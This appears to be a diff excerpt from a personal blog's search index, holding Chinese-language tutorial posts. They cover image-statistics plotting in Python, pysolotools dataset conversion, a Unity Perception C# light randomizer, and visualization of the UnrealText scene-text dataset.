    ax.annotate(text, xy=(x, y+0.05), fontsize=15)

    plt.plot([], [], '--', linewidth=1, color='black', label='Mean')
    plt.plot([], [], '-', linewidth=1, color='black', label='Median')

    # 使用 plt.legend() 函数添加图例,并设置坐标轴刻度、标签和标题等属性
    plt.legend(fontsize=15, loc="upper left")

    plt.xticks(fontsize=15 )
    plt.yticks(fontsize=15 )
    plt.xscale('log')
    plt.xlabel(f"Var of Laplacian of Background in log scale", fontsize=18)
    plt.ylabel("Dataset", fontsize=15)

    plt.show()

    png

    Wavelet

    这段代码用于对一个图像进行小波变换并对其水平和垂直方向的 cH 系数进行直方图分析,然后将两个方向的直方图绘制在同一个图表中。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    hist_list = []
    for coeff_type in ["horizontal", "vertical", "diagonal"]:
    coeff = result["WaveletTransformStatsAnalyzer"][coeff_type]
    hist = plt.hist(coeff, bins=np.logspace(np.log10(max([min(coeff), np.finfo(float).eps])), np.log10(max(coeff))))
    hist_list.append(hist)
    plt.close()

    fig, ax = plt.subplots(dpi=80, figsize=(10,6))
    colors = iter(plt.rcParams['axes.prop_cycle'].by_key()['color'])
    for hist, hist_type in zip(hist_list, ["horizontal", "vertical",]):
    norm_data = (hist[0] - min(hist[0]))/(max(hist[0])-min(hist[0]))
    ax.plot(hist[1][1:],norm_data, linestyle='-', label=hist_type, linewidth=3, color=next(colors))

    ax.set_xscale('log')

    plt.legend(loc="upper right", fontsize=15)
    plt.xlabel("Var of cH in Log Scale", fontsize=18)
    plt.ylabel("Density", fontsize=18)
    plt.xticks(fontsize=18)
    plt.yticks(fontsize=18)

    plt.setp(ax.spines.values(), linewidth=2.5)

    plt.show()

    png

    Power Spectrum

    这段代码用于计算一个图像的一维功率谱密度,使用可视化方式展示其频域特征。用户可以通过观察功率谱密度曲线来了解图像中不同频率成分所占比例的大小关系,以及在不同频率范围内的能量分布情况。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    psd_1d = np.nanmean(result["PowerSpectrumStatsAnalyzer"], axis=0)

    fig, ax = plt.subplots(dpi=100)
    colors = (plt.rcParams['axes.prop_cycle'].by_key()['color'])
    ax.plot(psd_1d, color=colors[1], label="PSD")

    plt.legend(fontsize=12)
    ax.set_xscale('log')
    ax.set_yscale('log')
    plt.ylabel("P(k)", fontsize=15)
    plt.xlabel("k", fontsize=15)
    plt.title("1D PSD")
    plt.xlim([1, None])
    plt.show()

    png

    Visualizing SOLO Datasets with Voxel51 and Pysolotools

    安装 OpenEXR(巨难装)、pysolotools-fiftyone:

    1
    2
    3
    4
    conda activate pysolotools_env
    conda install -c conda-forge openexr-python
    pip install openexr
    pip install pysolotools-fiftyone

    开跑!

    将生成的数据集放在一个文件夹中,不能有空格:D:\Study\1st-year-master\Datasets\solo_11

    终端输入:

    1
    pysolotools-fiftyone D:\Study\1st-year-master\Datasets\solo_11

    jpg

    Using Pysolotools to Convert From SOLO to COCO

    本指南将引导您完成将数据集从 SOLO 格式转换为 COCO 格式的整个过程。我们将使用 Unity 的计算机视觉团队的 pysolotools 来完成这项任务。Pysolotools 是一个 Python 包,它提供了各种工具来处理、分析和转换使用 Perception 包生成的 SOLO 数据集。

    1
    solo2coco <SOLO_PATH> <COCO_PATH>

    这玩意好像很吃性能,把该关的都关了,不然很容易挂。之后就能得到 COCO 格式的数据集:

    jpg

    ]]>
    @@ -6514,7 +6514,7 @@ /posts/Unity-Perception%20Synthetic%20Data-2/ - 正文

    在教程的第 1 阶段,我们学习了如何使用 Perception 软件包捆绑的 Randomizers。使用包含的 Randomizers,我们生成了 background 和 foreground 对象,随机化了它们的 position、rotation、texture 和 hue offset(色调偏移)(color)。在这个阶段,我们将为 Directional Light 对象构建一个自定义的灯光随机化器,它将控制 Scenario 的每个迭代中的灯光 intensity 和 color。我们还将学习如何将数据和逻辑捆绑在随机对象(如灯光)内,以便在每个对象的基础上更明确地定义和限制随机行为。

    Building a Light Randomizer

    我们需要为光随机化创建两个 C# 类,MyLightRandomizerMyLightRandomizerTag。(存放在一个 .cs 文件中)

    第一类 MyLightRandomizer 将随机值进行采样,并将其分配给光的强度和颜色。

    第二类 MyLightRandomizer 是将其添加到 Directional Light 的组件,使其成为 MyLightRandomizer 脚本的目标。

    ​ 在 Assets 文件夹下,Create-Perception-C# Randomizer and RandomizerTag ,这将新建一个 .cs 文件,将其命名为 MyLightRandomizerTag.cs。打开它,修改其中的代码:

    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    // 连接且仅能连接到含有 Light 组件的 GameObject
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    // MyLightRandomizerTag 是一个标记类,用于指定哪些物体可以被随机化器控制
    public class MyLightRandomizerTag : RandomizerTag { }

    [Serializable]
    // MyLightRandomizer 是一个随机化器类,用于在运行时间随机化物体属性。
    // 它使用 [AddRandomizerMenu("MyLightRandomizer")] 标签在 Perception 插件菜单中注册自己。
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
    // A parameter whose value uniformly ranges from 2 to 10 when sampled
    // 采样时其值统一在 2 到 10 之间的参数
    // 变量 lightIntensity 声明了一个名为 lightIntensity 的 FloatParameter 对象,
    // 它将在随机化过程中表示光强度值,并且可以设置默认值。
    // 其中,这个值的分布由 UniformSampler(均匀采样器)控制,范围是 0~1。
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };

    // Run this every randomization iteration
    // 每次随机化迭代都运行此操作
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    // 获取场景中所有的 MyLightRandomizerTag
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    // 获取其附加的 Light 组件并将其强度值设置为从 lightIntensity 随机采样的值
    tagLight.intensity = lightIntensity.Sample();
    }
    }
    }

    ​ 给 SimulationScenario 添加新的 Randomizers:MyLightRandomizer,将其 Range 设为 (0.5, 3)

    png

    ​ 在 Directional Light 里添加组件 My Light Randomizer Tag

    png

    为了让我们的定向光成为场景中唯一的光源,这样我们就可以清楚地看到我们工作的效果,还有一件事要做。默认情况下,HDRP 使用环境照明。要禁用它:

    ​ 在之前绑定 Motion Blur 组件的对象中,确保 Intenstiy=0。新建组件 Visual environment,将 Sky type 打勾,设为 None

    png

    ​ 开跑!

    png

    现在,让我们通过随机化光的颜色来增加更多的变化。

    ​ 操作:返回MyLightRandomizerTag.cs,在 MyLightRandomizer 类内,定义一个新的 ColorRgbParameter,在 MyLightRandomizer 类里定义新的变量:

    public ColorRgbParameter color;

    ​ 在遍历 tags 里添加:

    tagLight.color = color.Sample();

    png

    如果您现在检查 MyLightRandomizer 的 UI 片段,您会注意到添加了一个名为 Color 的新参数。此参数包括“红色”、“绿色”、“蓝色”和“阿尔法”的四个独立随机化值请注意,所有这些值的有效范围是 0-1(而不是 0-255)。您可以看到,红色、绿色和蓝色的采样范围当前设置为 0-1,这意味着“参数”覆盖了整个颜色范围。具有(0,0,0)RGB 分量的颜色基本上不发光。所以,让我们将最小值提高一点,以避免出现这种情况。

    ​ 将灯光颜色的最小值设在 0.4:

    png

    ​ 开跑!观察颜色变化:

    png

    Bundle Data and Logic Inside RandomizerTags

    您有时可能需要将某些与随机化相关的数据或逻辑绑定到对象中,这些数据或逻辑是对象本身固有的。例如,Scene 中可能有多个灯光,但希望每个灯光都有自己独特的强度范围。为每个灯光添加一个新的“参数”到灯光随机化器中只是为了实现这一点,这将是非常乏味的。此外,这会使您的光随机化器过度地针对一个用例进行定制,从而限制随机化器的可重用性。

    在某些情况下,您可能需要在对象中包含某些逻辑,以便使随机化器代码更易于重用和维护。例如,您可能想要构建一把办公椅预设,以便在各种模拟中使用。这把椅子可能支持对其各个部分(靠背角度、座椅角度、座椅高度等)的一系列自定义。与其直接将“旋转参数”从随机化器映射到椅子内靠背角度对象的旋转,不如让椅子以 0 到 1 之间的简单浮动形式显示可能的角度范围。使用这种方法,随机化器只需要对浮点参数进行采样并将其指定给椅子。反过来,椅子上会附上一个脚本,知道如何将这个单一的浮子映射到某个合理的后角。你甚至可以将这个浮点映射到椅子的一个更复杂的状态。您的随机化器仍然只需要一个浮点参数。

    ​ 选择对象 Directional LightCtrl+D 复制出一个新的对象 Directional Light (1),将 Directional LightY rotation 设为 60;将 Directional Light (1)Y rotation 设为 -60

    png

    这使得两个灯光从相反的角度照亮场景。请注意,Directional Lights 在 Unity 中的 position 不会影响它们照亮场景的方式,只会影响它们的 rotation。

    ​ 修改 MyLightRandomizerTag.cs 中的 MyLightRandomizerTag 类:

    public class MyLightRandomizerTag : RandomizerTag {
    public float minIntensity; // 光源强度的最小值
    public float maxIntensity; // 光源强度的最大值

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
    // 接受一个原始强度值(rawIntensity),并按比例将其缩放到 [minIntensity, maxIntensity] 区间内的一个值
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    tagLight.intensity = scaledIntensity;
    }
    }

    在上面的代码中,我们创建了一个新的 SetIntensity 函数,它首先将 incoming intensity(假设在 0 到 1 之间)缩放到我们想要的范围,然后将其分配给光的强度。Light 组件现在是从这个 Randomizer 标签所附的 GameObject 中提取的。这之所以有效,是因为这个标签组件和 Light 分量都附在场景中的同一个对象上(这是我们创建的 directional lights 之一)。

    该组件已添加到我们的两个灯光中。我们现在需要设置所需的最小和最大强度,这可以通过_Inspector_视图来完成。

    png

    ​ 打开 MyLightRandomizerTag.cs 修改 Randomizer 类中的 for 循环:

    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }

    ​ 开跑!

    png

    我们已经学会了如何:

    1. 下载 Unity Editor 并安装 Perception Package
    2. 使用 Scenario 和 Randomizers 设置场景以生成合成数据
    3. 使用 Perception 附带的 Randomizers 对模拟进行随机化
    4. 在 C# 中创建自定义随机化器,以满足更复杂/特定的随机化需求

    MyLightRandomizerTag.cs 完整代码:

    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    // 连接且仅能连接到含有 Light 组件的 GameObject
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    // MyLightRandomizerTag 是一个标记类,用于指定哪些物体可以被随机化器控制
    public class MyLightRandomizerTag : RandomizerTag
    {
    public float minIntensity; // 光源强度的最小值
    public float maxIntensity; // 光源强度的最大值

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
    // 接受一个原始强度值(rawIntensity),并按比例将其缩放到 [minIntensity, maxIntensity] 区间内的一个值
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    tagLight.intensity = scaledIntensity;
    }
    }

    [Serializable]
    // MyLightRandomizer 是一个随机化器类,用于在运行时间随机化物体属性。
    // 它使用 [AddRandomizerMenu("MyLightRandomizer")] 标签在 Perception 插件菜单中注册自己。
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
    // A parameter whose value uniformly ranges from 2 to 10 when sampled
    // 采样时其值统一在2到10之间的参数
    // 变量 lightIntensity 声明了一个名为 lightIntensity 的 FloatParameter 对象,
    // 它将在随机化过程中表示光强度值,并且可以设置默认值。
    // 其中,这个值的分布由 UniformSampler(均匀采样器)控制,范围是0~1。
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };
    public ColorRgbParameter color;

    // Run this every randomization iteration
    // 每次随机化迭代都运行此操作
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    // 获取场景中所有的 MyLightRandomizerTag
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }
    }
    }
    ]]>
    + 正文

    在教程的第 1 阶段,我们学习了如何使用 Perception 软件包捆绑的 Randomizers。使用包含的 Randomizers,我们生成了 background 和 foreground 对象,随机化了它们的 position、rotation、texture 和 hue offset(色调偏移)(color)。在这个阶段,我们将为 Directional Light 对象构建一个自定义的灯光随机化器,它将控制 Scenario 的每个迭代中的灯光 intensity 和 color。我们还将学习如何将数据和逻辑捆绑在随机对象(如灯光)内,以便在每个对象的基础上更明确地定义和限制随机行为。

    Building a Light Randomizer

    我们需要为光随机化创建两个 C# 类,MyLightRandomizerMyLightRandomizerTag。(存放在一个 .cs 文件中)

    第一类 MyLightRandomizer 将随机值进行采样,并将其分配给光的强度和颜色。

    第二类 MyLightRandomizer 是将其添加到 Directional Light 的组件,使其成为 MyLightRandomizer 脚本的目标。

    ​ 在 Assets 文件夹下,Create-Perception-C# Randomizer and RandomizerTag ,这将新建一个 .cs 文件,将其命名为 MyLightRandomizerTag.cs。打开它,修改其中的代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    // 连接且仅能连接到含有 Light 组件的 GameObject
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    // MyLightRandomizerTag 是一个标记类,用于指定哪些物体可以被随机化器控制
    public class MyLightRandomizerTag : RandomizerTag { }

    [Serializable]
    // MyLightRandomizer 是一个随机化器类,用于在运行时间随机化物体属性。
    // 它使用 [AddRandomizerMenu("MyLightRandomizer")] 标签在 Perception 插件菜单中注册自己。
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
    // A parameter whose value uniformly ranges from 2 to 10 when sampled
    // 采样时其值统一在 2 到 10 之间的参数
    // 变量 lightIntensity 声明了一个名为 lightIntensity 的 FloatParameter 对象,
    // 它将在随机化过程中表示光强度值,并且可以设置默认值。
    // 其中,这个值的分布由 UniformSampler(均匀采样器)控制,范围是 0~1。
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };

    // Run this every randomization iteration
    // 每次随机化迭代都运行此操作
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    // 获取场景中所有的 MyLightRandomizerTag
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    // 获取其附加的 Light 组件并将其强度值设置为从 lightIntensity 随机采样的值
    tagLight.intensity = lightIntensity.Sample();
    }
    }
    }

    ​ 给 SimulationScenario 添加新的 Randomizers:MyLightRandomizer,将其 Range 设为 (0.5, 3)

    png

    ​ 在 Directional Light 里添加组件 My Light Randomizer Tag

    png

    为了让我们的定向光成为场景中唯一的光源,这样我们就可以清楚地看到我们工作的效果,还有一件事要做。默认情况下,HDRP 使用环境照明。要禁用它:

    ​ 在之前绑定 Motion Blur 组件的对象中,确保 Intenstiy=0。新建组件 Visual environment,将 Sky type 打勾,设为 None

    png

    ​ 开跑!

    png

    现在,让我们通过随机化光的颜色来增加更多的变化。

    ​ 操作:返回MyLightRandomizerTag.cs,在 MyLightRandomizer 类内,定义一个新的 ColorRgbParameter,在 MyLightRandomizer 类里定义新的变量:

    1
    public ColorRgbParameter color;

    ​ 在遍历 tags 里添加:

    1
    tagLight.color = color.Sample();

    png

    如果您现在检查 MyLightRandomizer 的 UI 片段,您会注意到添加了一个名为 Color 的新参数。此参数包括“红色”、“绿色”、“蓝色”和“阿尔法”的四个独立随机化值请注意,所有这些值的有效范围是 0-1(而不是 0-255)。您可以看到,红色、绿色和蓝色的采样范围当前设置为 0-1,这意味着“参数”覆盖了整个颜色范围。具有(0,0,0)RGB 分量的颜色基本上不发光。所以,让我们将最小值提高一点,以避免出现这种情况。

    ​ 将灯光颜色的最小值设在 0.4:

    png

    ​ 开跑!观察颜色变化:

    png

    Bundle Data and Logic Inside RandomizerTags

    您有时可能需要将某些与随机化相关的数据或逻辑绑定到对象中,这些数据或逻辑是对象本身固有的。例如,Scene 中可能有多个灯光,但希望每个灯光都有自己独特的强度范围。为每个灯光添加一个新的“参数”到灯光随机化器中只是为了实现这一点,这将是非常乏味的。此外,这会使您的光随机化器过度地针对一个用例进行定制,从而限制随机化器的可重用性。

    在某些情况下,您可能需要在对象中包含某些逻辑,以便使随机化器代码更易于重用和维护。例如,您可能想要构建一把办公椅预设,以便在各种模拟中使用。这把椅子可能支持对其各个部分(靠背角度、座椅角度、座椅高度等)的一系列自定义。与其直接将“旋转参数”从随机化器映射到椅子内靠背角度对象的旋转,不如让椅子以 0 到 1 之间的简单浮动形式显示可能的角度范围。使用这种方法,随机化器只需要对浮点参数进行采样并将其指定给椅子。反过来,椅子上会附上一个脚本,知道如何将这个单一的浮子映射到某个合理的后角。你甚至可以将这个浮点映射到椅子的一个更复杂的状态。您的随机化器仍然只需要一个浮点参数。

    ​ 选择对象 Directional LightCtrl+D 复制出一个新的对象 Directional Light (1),将 Directional LightY rotation 设为 60;将 Directional Light (1)Y rotation 设为 -60

    png

    这使得两个灯光从相反的角度照亮场景。请注意,Directional Lights 在 Unity 中的 position 不会影响它们照亮场景的方式,只会影响它们的 rotation。

    ​ 修改 MyLightRandomizerTag.cs 中的 MyLightRandomizerTag 类:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    public class MyLightRandomizerTag : RandomizerTag {
    public float minIntensity; // 光源强度的最小值
    public float maxIntensity; // 光源强度的最大值

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
    // 接受一个原始强度值(rawIntensity),并按比例将其缩放到 [minIntensity, maxIntensity] 区间内的一个值
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    tagLight.intensity = scaledIntensity;
    }
    }

    在上面的代码中,我们创建了一个新的 SetIntensity 函数,它首先将 incoming intensity(假设在 0 到 1 之间)缩放到我们想要的范围,然后将其分配给光的强度。Light 组件现在是从这个 Randomizer 标签所附的 GameObject 中提取的。这之所以有效,是因为这个标签组件和 Light 分量都附在场景中的同一个对象上(这是我们创建的 directional lights 之一)。

    该组件已添加到我们的两个灯光中。我们现在需要设置所需的最小和最大强度,这可以通过_Inspector_视图来完成。

    png

    ​ 打开 MyLightRandomizerTag.cs 修改 Randomizer 类中的 for 循环:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }

    ​ 开跑!

    png

    我们已经学会了如何:

    1. 下载 Unity Editor 并安装 Perception Package
    2. 使用 Scenario 和 Randomizers 设置场景以生成合成数据
    3. 使用 Perception 附带的 Randomizers 对模拟进行随机化
    4. 在 C# 中创建自定义随机化器,以满足更复杂/特定的随机化需求

    MyLightRandomizerTag.cs 完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    using System;
    using UnityEngine;
    using UnityEngine.Perception.Randomization.Parameters;
    using UnityEngine.Perception.Randomization.Randomizers;
    using UnityEngine.Perception.Randomization.Samplers;

    // Can only attach to GameObjects which also have a Light component attached
    // 连接且仅能连接到含有 Light 组件的 GameObject
    [RequireComponent(typeof(Light))]
    // This tag is used to "target" which objects in the scene will be randomized
    // MyLightRandomizerTag 是一个标记类,用于指定哪些物体可以被随机化器控制
    public class MyLightRandomizerTag : RandomizerTag
    {
    public float minIntensity; // 光源强度的最小值
    public float maxIntensity; // 光源强度的最大值

    public void SetIntensity(float rawIntensity)
    {
    var tagLight = GetComponent<Light>();
    // 接受一个原始强度值(rawIntensity),并按比例将其缩放到 [minIntensity, maxIntensity] 区间内的一个值
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    var scaledIntensity = rawIntensity * (maxIntensity - minIntensity) + minIntensity;
    // 使用该值设置该游戏对象所连接的 Light 组件的强度
    tagLight.intensity = scaledIntensity;
    }
    }

    [Serializable]
    // MyLightRandomizer 是一个随机化器类,用于在运行时间随机化物体属性。
    // 它使用 [AddRandomizerMenu("MyLightRandomizer")] 标签在 Perception 插件菜单中注册自己。
    [AddRandomizerMenu("MyLightRandomizer")]
    public class MyLightRandomizer : Randomizer
    {
    // A parameter whose value uniformly ranges from 2 to 10 when sampled
    // 采样时其值统一在2到10之间的参数
    // 变量 lightIntensity 声明了一个名为 lightIntensity 的 FloatParameter 对象,
    // 它将在随机化过程中表示光强度值,并且可以设置默认值。
    // 其中,这个值的分布由 UniformSampler(均匀采样器)控制,范围是0~1。
    public FloatParameter lightIntensity = new() { value = new UniformSampler(0, 1) };
    public ColorRgbParameter color;

    // Run this every randomization iteration
    // 每次随机化迭代都运行此操作
    protected override void OnIterationStart()
    {
    // Get all MyLightRandomizerTag's in the scene
    // 获取场景中所有的 MyLightRandomizerTag
    var tags = tagManager.Query<MyLightRandomizerTag>();
    foreach (var tag in tags)
    {
    // Get the light attached to the object
    // 获得其 Light 组件
    var tagLight = tag.GetComponent<Light>();
    tagLight.color = color.Sample();
    // Call the SetIntensity function we defined in the tag instead!
    tag.SetIntensity(lightIntensity.Sample());
    }
    }
    }
    ]]>
    @@ -6572,7 +6572,7 @@ /posts/Paper-UnrealText-Synthesizing%20Realistic%20Scene%20Text%20Images%20from%20the%20Unreal%20World/ - 资源

    原文

    代码

    官网

    数据集

    LanuagesNum of ImagesNum of TextBaidu DriveGoogle Drive
    English/Latin72.8 万~20MLink password: 2h8dLink
    Multilingual67.4 万~18MLink password: tddlLink

    Multilingual 多语言版本包含 10 种语言:阿拉伯语,英语,法语,中文,德语,韩语,日语,意大利语,孟加拉语,印地语

    这两个数据集大概有 150 GB 左右,所以把它拆成了 130 个左右的文件,它们的组织方式如下:

    ./
    +---sub_0
    +---imgs
    | 0.jpg
    | 1.jpg
    | ...
    |
    +---labels
    | 0.json
    | 1.json
    | ...
    |
    +---sub_1
    +---sub_2
    +---sub_3
    ...
    +---sub_100
    ...

    标签按以下格式存储:

    {
    "imgfile":str path to the corresponding image file, e.g. "imgs/0.jpg",
    "bbox": List[
    word_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "cbox": List[
    char_i(8 float):[x0, y0, x1, y1, x2, y2, x3, x4]
    (from upper left corner, clockwise),
    ],
    "text": List[str]
    }

    举例:

    jpg

    {
    "imgfile": "imgs/54.jpg",
    "bbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "cbox": [[478, 188, 526, 234, 526, 248, 477, 203], [479, 223, 527, 265, 526, 281, 477, 239], [474, 251, 527, 295, 527, 307, 473, 264],

    ......

    , [236, 437, 291, 457, 286, 475, 229, 456], [222, 476, 274, 492, 268, 514, 214, 500], [457, 560, 572, 536, 578, 573, 459, 593], [590, 532, 781, 492, 799, 547, 598, 579], [809, 489, 844, 482, 860, 524, 823, 530], [214, 652, 274, 644, 267, 674, 207, 679]],
    "text": ["\"process", "Caloger", "billowin", "746", "Sasc", "(Twitter", "AlHarth", "corporation", "Val", "MARKET", "habits", "He", "\u201cT", "(tr", "hu", "180", "Dr", "Ch", "sic", "Ab", "Fo", "in", "Temes,", "Ar", "F3D2Ms)", "Viaduct\"", "\u2018An", "dracae", "\u00d8land", "\"Dev", "throwback", "locus", "GB)", "Central\u2013St", "USHL/NH", "touc", "Sele", "flat", "tsao", "Novn", "Eckh", "French", "Melapia", "E", "floor"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    jpg

    {
    "imgfile": "imgs/15.jpg",
    "bbox": [[772, 225, 807, 221, 806, 233, 771, 237], [811, 217, 888, 207, 886, 228, 810, 236],

    ......

    , [815, 301, 857, 303, 855, 314, 814, 311], [862, 304, 894, 305, 891, 316, 860, 314], [900, 306, 931, 307, 927, 322, 897, 319]],
    "cbox": [[772, 226, 773, 226, 773, 236, 771, 237], [774, 226, 779, 225, 778, 234, 773, 235],

    ......

    , [892, 309, 893, 309, 891, 316, 890, 316], [900, 306, 912, 306, 909, 318, 897, 317], [913, 306, 922, 307, 919, 318, 910, 318], [922, 311, 928, 311, 925, 321, 920, 320], [927, 320, 928, 320, 927, 322, 926, 322]],
    "text": ["[Mondial]", "\u092d\u0942\u0935\u093f\u091c\u094d\u091e\u093e\u0928\u0940\u0913\u0901", "\u0926\u0928\u093f\u092f\u093e\u0932", "1011)",

    ......

    , "31,438", "6/8/2006", "\u0646\u0628\u064a\u0644", "\u0646\u0627\u0637\u0642\u062a\u0627\u0646", "\u0645\u0647", "\u092e\u0948\u091f\u0930\u0928\u093f\u0916", "\u0935\u093f\u091a\u0947\u091c", "\u091b\u093f\u091c\u093c"],
    "is_difficult": [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    }

    感觉只能处理一定的光照和透视,不是很好地适应模型表面的纹理。使用 Unicode 字符编码处理非拉丁文本。

    可视化

    写了个代码对这个数据集进行可视化,感觉 bboxcbox 的属性是完全一样的?(有的数据集中 bbox 是按行分类,cbox 是按字分割)

    import cv2
    import os
    import matplotlib.pyplot as plt
    import json
    import numpy as np

    index = 93

    image_dir = r'E:\dataset\UnrealText\sub_103\imgs\\'
    label_dir = r'E:\dataset\UnrealText\sub_103\labels\\'

    image_path = os.path.join(image_dir, str(index) + '.jpg')
    label_path = os.path.join(label_dir, str(index) + '.json')

    image_origin = cv2.imread(image_path)
    image_bbox = image_origin.copy()
    image_cbox = image_origin.copy()
    height, width, _ = image_origin.shape

    with open(label_path, 'r') as f:
    data = json.load(f)

    for i, b in enumerate(data['bbox']):
    points = np.array([b[i:i+2] for i in range(0, len(b), 2)])
    cv2.polylines(image_bbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_bbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    cv2.putText(image_bbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))

    for i, c in enumerate(data['cbox']):
    points = np.array([c[i:i+2] for i in range(0, len(c), 2)])
    cv2.polylines(image_cbox, [points], isClosed=True, color=(255, 0, 0), thickness=2)
    for p in points:
    cv2.circle(image_cbox, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)
    # cv2.putText(image_cbox, data['text'][i], (points[0][0], points[0][1] + int(min(height, width) / 50)), cv2.FONT_HERSHEY_SIMPLEX,
    # min(height, width) / 1000, (255, 0, 255), int(min(height, width) / 500))


    fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(32, 18))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image_bbox, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('bbox')

    axes[2].imshow(cv2.cvtColor(image_cbox, cv2.COLOR_BGR2RGB))
    axes[2].axis('off')
    axes[2].set_title('cbox')

    plt.tight_layout()
    plt.show()

    png

    UE 演示项目

    Scene NameBaidu DriveGoogle Drive
    Realistic RenderingLink password: wgjaLink

    jpg

